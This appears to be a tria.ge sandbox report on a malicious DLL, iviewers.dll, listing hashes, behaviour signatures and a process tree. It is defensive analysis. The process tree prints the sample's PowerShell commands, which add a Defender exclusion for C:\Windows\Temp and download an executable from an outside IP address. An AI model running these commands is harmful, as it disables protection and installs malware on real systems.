Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
19/12/2024, 07:25
Static task
static1
Behavioral task
behavioral1
Sample
iviewers.dll
Resource
win7-20240729-en
General
-
Target
iviewers.dll
-
Size
6KB
-
MD5
e017be56699801dc89a8d6d1724eb633
-
SHA1
a7f7aae4744210db8ebaf4da06c167357bc71eca
-
SHA256
aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564
-
SHA512
2368425dadc7f22eb11532359d4d1aa97bf3e381f4fd7b62c587e1f8819ef64a0ff7fc75cc5948939fadebc423345ab65a1cd2799bb4136fbea89d1f75dfc8c8
-
SSDEEP
96:fNnyOybUJQ23GgX791qKilsZODTgFZP/8R:fNnyOybrVO9QKilhfgFZP/u
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2944 powershell.exe 2596 powershell.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 2640 2732 WerFault.exe 30 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2944 powershell.exe 2596 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 2716 wrote to memory of 2732 2716 regsvr32.exe 30 PID 2716 wrote to memory of 2732 2716 regsvr32.exe 30 PID 2716 wrote to memory of 2732 2716 regsvr32.exe 30 PID 2716 wrote to memory of 2732 2716 regsvr32.exe 30 PID 2716 wrote to memory of 2732 2716 regsvr32.exe 30 PID 2716 wrote to memory of 2732 2716 regsvr32.exe 30 PID 2716 wrote to memory of 2732 2716 regsvr32.exe 30 PID 2732 wrote to memory of 2944 2732 regsvr32.exe 31 PID 2732 wrote to memory of 2944 2732 regsvr32.exe 31 PID 2732 wrote to memory of 2944 2732 regsvr32.exe 31 PID 2732 wrote to memory of 2944 2732 regsvr32.exe 31 PID 2732 wrote to memory of 2596 2732 regsvr32.exe 33 PID 2732 wrote to memory of 2596 2732 regsvr32.exe 33 PID 2732 wrote to memory of 2596 2732 regsvr32.exe 33 PID 2732 wrote to memory of 2596 2732 regsvr32.exe 33 PID 2732 wrote to memory of 2640 2732 regsvr32.exe 35 PID 2732 wrote to memory of 2640 2732 regsvr32.exe 35 PID 2732 wrote to memory of 2640 2732 regsvr32.exe 35 PID 2732 wrote to memory of 2640 2732 regsvr32.exe 35
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll1⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\iviewers.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\lrak4gvn.ya5.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 8003⤵
- Program crash
PID:2640
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5d843ad1d3a565ffd71df08167123e449
SHA1da34109ca4b2d3b93676e2d9a722e5021bf09dc2
SHA2567c8cf9821671b458f977437a505940f12a7428098d0d589f16abfb454d8b3b88
SHA51231ac7fd3cfb1b0cca94a443bf112294ba3b19ea84f6b111c4becfa622540177ac1d9e7696c2011f9df426868c242ed2aa1eb8bb2010b686a0ace9be631ca2118